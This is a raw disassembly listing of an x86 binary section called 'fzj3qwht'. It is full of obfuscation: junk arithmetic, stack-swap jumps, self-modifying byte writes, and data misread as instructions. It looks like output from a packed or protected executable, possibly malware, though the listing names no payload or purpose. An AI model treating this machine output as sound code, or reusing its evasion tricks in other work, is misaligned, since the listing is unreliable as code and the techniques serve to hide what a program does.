dd 0AABA0000h, 0E90042FFh, 0FFFFFC3Eh ; CODE XREF: fzj3qwht:loc_432061�j
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43038B: ; CODE XREF: fzj3qwht:0042FDC1�j
jmp loc_430E18
; ---------------------------------------------------------------------------
dd 7B680000h, 878B6225h, 0D78B243Ch, 179DE9h, 0C3000000h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FA52
loc_4303A4: ; CODE XREF: sub_42FA52+2680�j
mov byte ptr [eax], 87h
pop eax
and ebx, 1F990EC4h
add ebx, 0E3AAFFBEh
jmp loc_43273D
; END OF FUNCTION CHUNK FOR sub_42FA52
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430F48
loc_4303B9: ; CODE XREF: sub_430F48:loc_4327D8�j
mov byte ptr [edi], 0C3h
xchg esi, [esp+0]
mov edi, esi
pop esi
push edi
jmp loc_43167B
; END OF FUNCTION CHUNK FOR sub_430F48
; ---------------------------------------------------------------------------
call sub_431F1F
add [ebx], cl
std
mov edx, 3B8BEC23h
jmp sub_4312D7
; ---------------------------------------------------------------------------
dw 0C600h
; ---------------------------------------------------------------------------
add ecx, [ebx+1A68535Bh]
jns short loc_430427
db 67h
pop ebx
jmp loc_431C2C
; ---------------------------------------------------------------------------
align 4
loc_4303EC: ; DATA XREF: sub_42F4AE:loc_4325E1�o
mov byte ptr [ebx], 9Ch
pop ebx
rol eax, 2
or eax, 114A16D6h
push ecx
push 34BF00EFh
jmp loc_42ED4C
; ---------------------------------------------------------------------------
db 0
byte_430405 db 57h, 68h, 0BAh ; DATA XREF: sub_431452+35�o
dd 87D180A7h, 0FE8B2434h, 8CEF815Eh, 0E988D0A6h, 0FFFFF4FCh
db 0
; =============== S U B R O U T I N E =======================================
sub_43041D proc near ; CODE XREF: fzj3qwht:004316AE�p
; FUNCTION CHUNK AT 0042F32C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042F706 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042F88A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F922 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004304E8 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0043083D SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
push ebx
push 1E1EC43Bh
loc_430427: ; CODE XREF: fzj3qwht:004303E2�j
pop ebx
jmp loc_42F922
sub_43041D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_43042F: ; CODE XREF: sub_42F4AE+93�j
mov byte ptr [esi], 0Fh
pop esi
add edx, eax
rol edx, 3
xor edx, eax
jmp loc_43045A
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
align 10h
retn
; ---------------------------------------------------------------------------
jmp loc_432251
; ---------------------------------------------------------------------------
dw 8700h
dd 1AD1E9C7h, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F1F
loc_430450: ; CODE XREF: sub_431F1F:loc_43080B�j
push offset dword_430790
jmp nullsub_159
; END OF FUNCTION CHUNK FOR sub_431F1F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_43045A: ; CODE XREF: sub_42F4AE+F8C�j
push offset loc_42F14F
jmp nullsub_153
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
dd 0CD030000h, 825FC181h, 189AA43h, 0F045F459h, 1BE2E9h
db 3 dup(0)
byte_43047B db 81h ; DATA XREF: sub_431AED-2C9A�o
dd 734A9C0h, 1B3BE802h, 0E9000000h, 0FFFFED4Dh, 3537D381h
dd 85E93DA8h
db 10h, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_430497 proc near ; CODE XREF: fzj3qwht:00431A82�p
xchg edi, [esp+0]
pop edi
xor edx, 0E4959E5Ch
add edx, ebp
push esi
push 0D5AABFF9h
pop esi
jmp near ptr loc_430BD0+1
sub_430497 endp
; ---------------------------------------------------------------------------
align 10h
dd 4FFC6800h, 8158D254h, 0E1F098E0h, 2E6850B5h, 5888F8C0h
dd 0F844E881h, 9DE92CF7h, 0FFFFE4h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EFCF
loc_4304D0: ; CODE XREF: sub_42EFCF+1514�j
; sub_42EFCF+17B4�j
mov byte ptr [esi], 0FFh
call sub_42F8A9
loc_4304D8: ; CODE XREF: sub_42FC3B+D�p
add [edi+0C872414h], al
and al, 8Bh
rcr dword ptr [ecx-17h], 1
jle short loc_4304D0
; END OF FUNCTION CHUNK FOR sub_42EFCF
; ---------------------------------------------------------------------------
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43041D
loc_4304E8: ; CODE XREF: sub_43041D:loc_42F922�j
sub ebx, 76D13B0h
and ebx, 0B208DA5Eh
sub ebx, 0A57C4284h
and ebx, 50F69E62h
xor ebx, 5CC2470Dh
jmp loc_42F88A
; END OF FUNCTION CHUNK FOR sub_43041D
; ---------------------------------------------------------------------------
align 4
locret_43050C: ; CODE XREF: fzj3qwht:loc_430AB0�j
retn
; ---------------------------------------------------------------------------
loc_43050D: ; CODE XREF: fzj3qwht:00430D94�j
jmp loc_4316D6
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43098E
loc_430513: ; CODE XREF: sub_43098E+20�j
jmp loc_42FFB2
; END OF FUNCTION CHUNK FOR sub_43098E
; ---------------------------------------------------------------------------
dd 0DE5E900h, 0F000000h, 14F78Ch, 0E9EDD100h, 0FFFFEAC2h
db 2 dup(0), 99h
; =============== S U B R O U T I N E =======================================
sub_43052F proc near ; CODE XREF: sub_431F5F:loc_431971�p
; FUNCTION CHUNK AT 0043058C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004308D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431D1A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00431E31 SIZE 0000002A BYTES
xchg eax, [esp+0]
pop eax
mov edx, [eax]
or edx, edx
jmp loc_431E31
sub_43052F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 0FA810000h, 9B51C065h, 43DE9h, 0C8C10000h
db 0Ch
byte_43054D db 87h ; DATA XREF: fzj3qwht:0042E848�w
dw 2434h
byte_430550 db 5Eh ; DATA XREF: fzj3qwht:0042E84F�w
byte_430551 db 0Fh ; DATA XREF: fzj3qwht:0042E856�w
dw 4584h
dd 52000001h, 52E9D38Bh, 0Fh, 241CF900h, 0FFF75FE9h, 0B56800FFh
dd 68E4C0E9h, 42ED75h, 308E9h, 0C30000h, 0E95F2E87h, 0BE3h
dd 36E9EF33h, 1Ah
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43052F
loc_43058C: ; CODE XREF: sub_43052F+1927�j
add eax, 481A04D3h
jmp loc_4308D6
; END OF FUNCTION CHUNK FOR sub_43052F
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_431452
loc_430598: ; CODE XREF: sub_431452:loc_42EF52�j
call sub_431C52
add [edi], cl
test [esi+0FFFFFDh], ah
xchg ebx, ebp
and edx, 3E5C0832h
jmp loc_430338
; END OF FUNCTION CHUNK FOR sub_431452
; ---------------------------------------------------------------------------
dw 8100h
dd 0F3D438C9h, 2404874Ah, 302C658h, 0E9241C87h, 0FFFFF872h
dd 0C35D59h, 1CC5E900h, 51000000h, 0C875955h, 0B12E924h
dd 81000000h, 7CF099E0h, 37F08167h, 81B4F1AAh, 0C1D9A4C0h
dd 0E8C5037Eh, 220Ch, 2376E9h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430218
loc_4305FD: ; CODE XREF: sub_430218+22�j
jmp near ptr dword_42E9A4+51h
; END OF FUNCTION CHUNK FOR sub_430218
; ---------------------------------------------------------------------------
dw 8B00h
dd 0F9D4E9CDh
db 2 dup(0FFh)
; =============== S U B R O U T I N E =======================================
sub_43060A proc near ; CODE XREF: fzj3qwht:loc_42F912�p
xchg esi, [esp+0]
pop esi
mov byte ptr [ebx], 3
pop ebx
push offset loc_43002C
jmp nullsub_138
sub_43060A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 0FE188A0Fh, 0E98BFFFFh, 0C5E85A9Ch
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_43062B: ; CODE XREF: fzj3qwht:0042F1F1�j
jmp loc_42ED28
; ---------------------------------------------------------------------------
dd 0C28B5000h, 0BA240487h, 4318ECh, 0FFFC48E9h, 0F0000FFh
dd 0FFFD0188h, 3C1C1FFh, 800C1F7h, 0F3E90000h, 8100001Dh
dd 0F8D268C0h, 2F689DFFh, 0E9004328h, 21C4h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_430669: ; CODE XREF: sub_42F4AE+3A�j
jz near ptr loc_43287D+1
xchg edx, [esp-0Ch+arg_8]
pop edx
add edx, 0FB569FBFh
mov edx, [edx]
popf
push edx
jmp loc_43243C
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
dw 0C768h
dd 0E9004309h, 0FFFFF304h, 0C300h, 0A92C081h, 36E962EFh
dd 16h, 1202E8h, 240C8700h, 8B243487h, 10685ECEh, 0E9000020h
dd 0FFFFE2D1h
; ---------------------------------------------------------------------------
loc_4306B4: ; CODE XREF: fzj3qwht:00432566�j
mov byte ptr [ebx], 0FFh
pop ebx
mov [edx], al
dec dword ptr [ebp-10h]
xchg eax, ecx
inc ebp
cld
jmp loc_432501
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_4306C7: ; CODE XREF: fzj3qwht:0042F892�j
popf
xor edx, 41E859D5h
loc_4306CE: ; CODE XREF: fzj3qwht:loc_42F883�j
add esi, 93AF46DDh
rol esi, 19h
jmp near ptr dword_42EB78+0C2h
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_4306DE: ; CODE XREF: fzj3qwht:loc_431F0A�j
and esi, 0EAFE27D3h
push offset word_43211E
jmp locret_431202
; ---------------------------------------------------------------------------
align 10h
loc_4306F0: ; CODE XREF: fzj3qwht:004326E4�j
xchg esi, [esp]
pop esi
push ebp
mov ebp, edx
push offset dword_430800
jmp loc_4318F3
; ---------------------------------------------------------------------------
align 2
dw 5D68h
dd 0E90042E9h, 0FFFFE250h, 2012E8h, 97E90000h, 0
; ---------------------------------------------------------------------------
pop ecx
xor ecx, 2B1E8752h
sub ecx, 9E5F65DAh
rol ecx, 1Bh
add ecx, 0B1917298h
add eax, ecx
push esi
jmp loc_4309D2
; ---------------------------------------------------------------------------
dw 2300h
dd 0FE0CE9DEh, 8100FFFFh, 58E01FE1h, 0DE981B4h, 8130078Dh
dd 0DA1C4EC9h, 0B4850FDCh, 0FFFFF0h
; ---------------------------------------------------------------------------
loc_430758: ; CODE XREF: fzj3qwht:0042FD61�j
jmp loc_431EC6
; ---------------------------------------------------------------------------
align 2
retn
; ---------------------------------------------------------------------------
align 10h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EFCF
loc_430761: ; CODE XREF: sub_42EFCF+A�j
jmp loc_43077E
; END OF FUNCTION CHUNK FOR sub_42EFCF
; ---------------------------------------------------------------------------
dw 1487h
; ---------------------------------------------------------------------------
and al, 8Bh
retf 7C68h
; ---------------------------------------------------------------------------
db 23h, 43h, 0
dd 0FFF162E9h, 0E98500FFh, 2122E9h
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EFCF
loc_43077E: ; CODE XREF: sub_42EFCF:loc_430761�j
mov esi, offset loc_431A96
jmp loc_4304D0
; END OF FUNCTION CHUNK FOR sub_42EFCF
; ---------------------------------------------------------------------------
locret_430788: ; CODE XREF: fzj3qwht:004321FF�j
retn
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 0FFFFFE0Eh
dword_430790 dd 5E8906C6h, 903AF781h, 0FD0304A2h, 0FFE03CE8h
; DATA XREF: sub_431F1F:loc_430450�o
db 0FFh
; ---------------------------------------------------------------------------
loc_4307A1: ; CODE XREF: fzj3qwht:00430B94�p
xchg esi, [esp]
pop esi
xchg eax, [esp]
call near ptr byte_42FE51+2
add [eax+44h], ch
pop ss
inc ebx
add cl, ch
aas
push es
; ---------------------------------------------------------------------------
dw 0
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FC3B
loc_4307B9: ; CODE XREF: sub_42FC3B+15�j
xchg edi, [esp-4+arg_0]
pop edi
mov [esi], eax
xchg eax, [esp-8+arg_4]
mov esi, eax
pop eax
popf
mov eax, [ebp-0Ch]
jmp loc_430878
; END OF FUNCTION CHUNK FOR sub_42FC3B
; ---------------------------------------------------------------------------
align 10h
loc_4307D0: ; CODE XREF: fzj3qwht:loc_431A25�j
mov byte ptr [edx], 3
pop edx
push 0A02301E8h
pop eax
add eax, 0ECD0754h
xor eax, 72FFB596h
and eax, 0E29B1602h
sub eax, 4EFECD96h
jmp loc_42EE5E
; ---------------------------------------------------------------------------
align 4
dd 0E9CE1300h, 0FFFFF4D3h
dword_430800 dd 51242C87h, 94BE8h ; DATA XREF: fzj3qwht:004306F7�o
db 3 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F1F
loc_43080B: ; CODE XREF: sub_431F1F+12�j
jmp loc_430450
; END OF FUNCTION CHUNK FOR sub_431F1F
; ---------------------------------------------------------------------------
locret_430810: ; CODE XREF: fzj3qwht:00430CF7�j
retn
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 0FFFFEECEh, 0EB8AE900h, 3487FFFFh, 738E824h, 0
; ---------------------------------------------------------------------------
loc_430828: ; CODE XREF: fzj3qwht:loc_4328E4�j
add eax, 7F5B23DAh
loc_43082E: ; DATA XREF: sub_42FA52+267B�o
xchg eax, [esp]
retn
; ---------------------------------------------------------------------------
jmp loc_4312C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431167
loc_430837: ; CODE XREF: sub_431167+10�j
jmp loc_430E53
; END OF FUNCTION CHUNK FOR sub_431167
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43041D
loc_43083D: ; CODE XREF: sub_43041D-10E9�j
jmp nullsub_149
; END OF FUNCTION CHUNK FOR sub_43041D
; ---------------------------------------------------------------------------
push offset loc_430143
jmp locret_42FB1E
; ---------------------------------------------------------------------------
mov edi, [edi]
popf
xchg edi, [esp]
call eax
jmp loc_4316B5
; ---------------------------------------------------------------------------
align 2
dw 8B52h
dd 241487D5h, 0BFE9EC8Bh, 0FFFFF6h, 0E9E91B00h, 0E52h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_100. PRESS KEYPAD "+" TO EXPAND]
db 3Bh, 0F8h, 0E9h
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
db 0FDh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FC3B
loc_430878: ; CODE XREF: sub_42FC3B+B8E�j
mov esp, ebp
xchg edi, [esp-10h+arg_C]
mov ebp, edi
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_42FC3B
; ---------------------------------------------------------------------------
jmp locret_431358
; ---------------------------------------------------------------------------
align 4
dd 43251C68h, 0FA9FE900h, 8700FFFFh, 1487240Ch, 5ACA8B24h
dd 58CAC081h, 0C684AD4h, 0E90042F3h, 0FFFFE6E4h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F04D
loc_4308AD: ; CODE XREF: sub_42F04D:loc_42F05F�j
mov ebx, eax
pop eax
xchg edx, [esp-8+arg_4]
jmp nullsub_139
; END OF FUNCTION CHUNK FOR sub_42F04D
; ---------------------------------------------------------------------------
db 0
byte_4308B9 db 46h, 5, 9Dh ; DATA XREF: sub_4301AC+1�o
dd 0F004321h, 0FFF27A81h, 636851FFh, 59F8CDEAh, 0FFFC48E9h
db 0FFh, 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_157. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43052F
loc_4308D6: ; CODE XREF: sub_43052F+63�j
jmp near ptr loc_42E94A+1
; END OF FUNCTION CHUNK FOR sub_43052F
; ---------------------------------------------------------------------------
align 4
dword_4308DC dd 0A68A6857h, 815F43D5h, 0BB295ACFh, 0EEEF8175h, 0E97D59ABh
; DATA XREF: fzj3qwht:loc_4313A4�o
dd 0FFFFE3F8h, 3C870000h, 0EEA46824h, 0C5E90042h, 12h
dd 5F595700h, 0FFF9FAE8h, 0E90000FFh, 0C5Ah
db 2 dup(0), 5Eh
; =============== S U B R O U T I N E =======================================
sub_430917 proc near ; CODE XREF: sub_43052F+17F1�p
; FUNCTION CHUNK AT 00432020 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004325CD SIZE 00000013 BYTES
xchg ebx, [esp+0]
pop ebx
push edx
mov edx, offset nullsub_145
jmp loc_4325CD
sub_430917 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
dd 72CB8100h, 0E9D35C8Fh, 0FFFFF11Eh
db 0
; ---------------------------------------------------------------------------
loc_430935: ; CODE XREF: fzj3qwht:loc_431D4E�j
and ecx, 1B0B4F78h
or ecx, 6F446674h
and ecx, 0B2A390A5h
add ecx, 0BB006063h
jmp loc_42F969
; ---------------------------------------------------------------------------
dw 0C0F7h
dd 400h, 0FFFE2EE9h
db 0FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431686
loc_43095D: ; CODE XREF: sub_431686-17BC�j
add esi, 1053F6C4h
jmp loc_42F3B0
; END OF FUNCTION CHUNK FOR sub_431686
; ---------------------------------------------------------------------------
dd 1C870000h, 24348724h, 0E95EDE8Bh, 490h, 68B0000h, 0E915C0C1h
dd 0F5Eh
db 0
; ---------------------------------------------------------------------------
locret_430985: ; CODE XREF: fzj3qwht:00431B87�j
retn
; ---------------------------------------------------------------------------
dw 8B0Fh
dd 0FFFFEC49h
; ---------------------------------------------------------------------------
not esi
; =============== S U B R O U T I N E =======================================
sub_43098E proc near ; CODE XREF: sub_42F4AE+AA�p
; FUNCTION CHUNK AT 0042FFB2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430513 SIZE 00000005 BYTES
xchg edi, [esp+0]
call sub_431F5F
add cl, ch
mov ecx, 0FFFFEEh
loc_43099D: ; CODE XREF: sub_43193B+6�p
xchg edx, [esp+0]
xchg ecx, [esp+0]
mov edx, ecx
pop ecx
add edx, 0D5527689h
mov [edx], eax
jmp loc_430513
sub_43098E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 0A695F781h, 0C7E83189h, 13h, 24E9F985h, 0C600000Ah
dd 52598701h, 0FFF42AE8h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
loc_4309D2: ; CODE XREF: fzj3qwht:00430731�j
jmp loc_43119C
; ---------------------------------------------------------------------------
pop eax
jmp sub_431F5F
; ---------------------------------------------------------------------------
popf
jmp sub_42F04D
; ---------------------------------------------------------------------------
align 4
dd 0E9D02B00h, 0FFFFEEB7h
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_4309EE proc near ; CODE XREF: sub_42F4AE+E4�j
; FUNCTION CHUNK AT 00430165 SIZE 0000000D BYTES
xchg edx, [esp+0]
pop edx
call sub_42FCC8
push eax
mov eax, edx
jmp loc_430165
sub_4309EE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
dd 24148700h, 64C3685Ah, 3C87FAC8h, 313E924h, 0D3870000h
dd 1DC5E9h, 87000000h, 0F204E9EBh
db 2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_160. PRESS KEYPAD "+" TO EXPAND]
align 4
loc_430A24: ; CODE XREF: fzj3qwht:0042F016�j
jmp near ptr dword_42EA44+22h
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_430A2B: ; DATA XREF: sub_430C13-AC1�o
add ebx, 3D5C3B8h
add eax, ebx
pop ebx
jmp loc_4322A0
; ---------------------------------------------------------------------------
align 2
; START OF FUNCTION CHUNK FOR sub_431F5F
loc_430A3A: ; CODE XREF: sub_431F5F:loc_430B0E�j
jz loc_430FBB
jmp loc_431971
; END OF FUNCTION CHUNK FOR sub_431F5F
; ---------------------------------------------------------------------------
db 2 dup(0), 33h
; ---------------------------------------------------------------------------
retf 19E9h
; ---------------------------------------------------------------------------
db 0F1h
dd 0FFFFh
; ---------------------------------------------------------------------------
loc_430A50: ; CODE XREF: fzj3qwht:loc_432601�j
call sub_42F263
loc_430A55: ; CODE XREF: fzj3qwht:0043252B�j
jmp loc_42F8E7
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_430A5C proc near ; CODE XREF: fzj3qwht:004301E8�p
; fzj3qwht:00432437�j
; FUNCTION CHUNK AT 00432538 SIZE 00000011 BYTES
xchg ecx, [esp+0]
xchg ebp, [esp+0]
mov ecx, ebp
pop ebp
xor eax, 19D8E3D8h
jmp loc_432538
sub_430A5C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_430A70: ; CODE XREF: sub_42F4AE+FD�j
call sub_432090
add cl, ch
dec eax
sbb al, [eax]
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_430A7B: ; CODE XREF: fzj3qwht:004301FD�j
jmp loc_430DC9
; ---------------------------------------------------------------------------
mov byte ptr [esi], 0F7h
pop esi
add eax, 0E333E616h
mov eax, [eax]
pushf
push 8A084C90h
pop ecx
sub ecx, 27FDBE04h
and ecx, 8B247CE8h
xor ecx, 2000C82h
popf
cdq
jmp loc_431720
; ---------------------------------------------------------------------------
db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_148. PRESS KEYPAD "+" TO EXPAND]
align 10h
loc_430AB0: ; CODE XREF: fzj3qwht:0042EDC4�j
jmp locret_43050C
; ---------------------------------------------------------------------------
align 2
dw 7DE9h
dd 0FFFFEFh, 0E08100C3h, 0F03BC797h, 0A521C081h, 0C5F4D50Ah
dd 0FFFDC2E8h
db 0FFh
; ---------------------------------------------------------------------------
loc_430AD1: ; CODE XREF: fzj3qwht:004311B0�j
jmp locret_43201D
; ---------------------------------------------------------------------------
dw 880Fh
dd 0FFFFECA0h, 0FFF422E9h, 810000FFh, 0E3E96CCBh, 0F005E995h
db 2 dup(0FFh)
; =============== S U B R O U T I N E =======================================
sub_430AEE proc near ; CODE XREF: sub_431686:loc_43278E�p
; FUNCTION CHUNK AT 00430C3D SIZE 0000000C BYTES
xchg edx, [esp+0]
xchg edi, [esp+0]
mov edx, edi
pop edi
push 0A9064E4Ch
pop ebx
and ebx, 1B53BD8Dh
jmp loc_430C3D
sub_430AEE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
add eax, 0E7D41996h
; START OF FUNCTION CHUNK FOR sub_431F5F
loc_430B0E: ; CODE XREF: sub_431F5F:loc_431E9F�j
jo loc_430A3A
push 432794h
jmp loc_42F134
; END OF FUNCTION CHUNK FOR sub_431F5F
; ---------------------------------------------------------------------------
align 10h
retn
; ---------------------------------------------------------------------------
jmp loc_431E06
; ---------------------------------------------------------------------------
dw 6857h
dd 12E1B58Fh, 0DBEF815Fh, 8120211Ah, 64D75CCFh, 16EF814Bh
dd 816A740Ah, 0D223C4C7h, 0F7E1E96Eh, 0FFFFh, 1C87D103h
dd 3C875B24h, 68505F24h, 6CBB7C99h, 0FFF8E0E9h, 820F00FFh
dd 1AE6h
; =============== S U B R O U T I N E =======================================
sub_430B68 proc near ; CODE XREF: sub_42F4AE-2A7�p
; sub_43041D-D08�j
arg_0 = dword ptr 4
xchg eax, [esp+0]
pop eax
xchg edx, [esp-4+arg_0]
jmp nullsub_139
sub_430B68 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 73E80000h, 0FFFFE4h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431686
loc_430B7C: ; CODE XREF: sub_431686+12BE�j
jns loc_4310C1
push 9E4C1933h
pop eax
push edi
jmp near ptr dword_42E868+1Ch
; END OF FUNCTION CHUNK FOR sub_431686
; ---------------------------------------------------------------------------
loc_430B8E: ; CODE XREF: fzj3qwht:loc_432001�j
xor eax, 9F56F3FFh
call loc_4307A1
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_430B9B: ; DATA XREF: fzj3qwht:0042F898�o
mov byte ptr [edx], 87h
pop edx
push offset word_43200E
jmp locret_432000
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_430BAB: ; CODE XREF: fzj3qwht:loc_42F38D�j
and esi, 56C30AC3h
xor esi, 304C1929h
sub esi, 20839A28h
xor esi, 8F697A0h
add esi, ebp
add esi, 0A2801F59h
call sub_42F04D
loc_430BD0: ; CODE XREF: sub_430497+13�j
add cl, ch
push esp
or [eax], al
; ---------------------------------------------------------------------------
db 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_430BD8 proc near ; CODE XREF: sub_431686-5C0�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00432868 SIZE 0000000A BYTES
xchg edx, [esp+0]
pop edx
xchg ecx, [esp-4+arg_0]
mov eax, ecx
pop ecx
xor eax, 19D15691h
sub eax, 82409A69h
jmp loc_432868
sub_430BD8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
loc_430BF4: ; CODE XREF: fzj3qwht:0042F14A�j
xor ebx, 97F0052Ah
add ebx, 0A2115E5h
sub ebx, 5F8A8645h
add ebx, 0BE87D32Ah
jmp loc_42F556
; ---------------------------------------------------------------------------
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_430C13 proc near ; CODE XREF: fzj3qwht:0042F8C2�p
; fzj3qwht:0042FB18�j
; FUNCTION CHUNK AT 0043013E SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00431C41 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
xor edx, 0C17A9617h
add edx, ebp
add edx, 0C9F2F653h
jmp loc_431C41
sub_430C13 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_134. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301AC
loc_430C2F: ; CODE XREF: sub_4301AC+1C1D�j
jmp loc_43138D
; END OF FUNCTION CHUNK FOR sub_4301AC
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_430C36: ; CODE XREF: fzj3qwht:0042FE1C�j
jmp locret_432044
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430AEE
loc_430C3D: ; CODE XREF: sub_430AEE+15�j
jnz loc_431517
add [ebx+8C3E92Bh], cl
; END OF FUNCTION CHUNK FOR sub_430AEE
; ---------------------------------------------------------------------------
db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_141. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(0)
word_430C4E dw 0C009h ; DATA XREF: sub_42FFDE:loc_4317CC�o
dd 0E1AB850Fh, 0D0E9FFFFh, 87FFFFDCh, 5559240Ch, 6A68EE8Bh
dd 0E90042FCh, 0FFFFFE50h, 5A241487h, 0DDFEC681h, 1689FCB6h
dd 0E9242C87h, 0FFFFF603h, 288B0000h, 12E9CD85h, 19h
; =============== S U B R O U T I N E =======================================
sub_430C8C proc near ; CODE XREF: fzj3qwht:0042F2AF�j
; fzj3qwht:0043291C�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042F2A8 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
add ebx, 9A06B325h
loc_430C96: ; DATA XREF: sub_431167-224B�o
xchg ebx, [esp-4+arg_0]
jmp loc_42F2A8
sub_430C8C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_431686
loc_430CA0: ; CODE XREF: sub_431686:loc_42F3B0�j
mov byte ptr [esi], 9Dh
pop esi
add esi, ebp
add esi, 0D6554B8Ah
mov esi, [esi]
xchg esi, [esp+4+var_4]
push ebx
loc_430CB2: ; DATA XREF: sub_431686-2344�o
pushf
jmp loc_432306
; END OF FUNCTION CHUNK FOR sub_431686
; ---------------------------------------------------------------------------
dd 3C60000h, 7C65B8Bh, 535A5F89h, 54368668h, 0F92AE99Fh
dd 0FFFFh, 0D901F381h, 1C870002h
; ---------------------------------------------------------------------------
and al, 88h ; DATA XREF: sub_4316FE+B�o
adc eax, offset dword_42A104
mov esp, ebp
jmp loc_432633
; ---------------------------------------------------------------------------
align 4
add esi, ebp
add esi, 6820699Fh
mov esi, [esi]
push 43081Eh
jmp locret_430810
; ---------------------------------------------------------------------------
dd 243C8700h, 0C015FF5Fh, 6A0042A0h, 0C015FFFFh, 0E90042A0h
dd 0FFFFF611h, 0A8B0000h, 744AC581h, 74E9F319h, 0FFFFECh
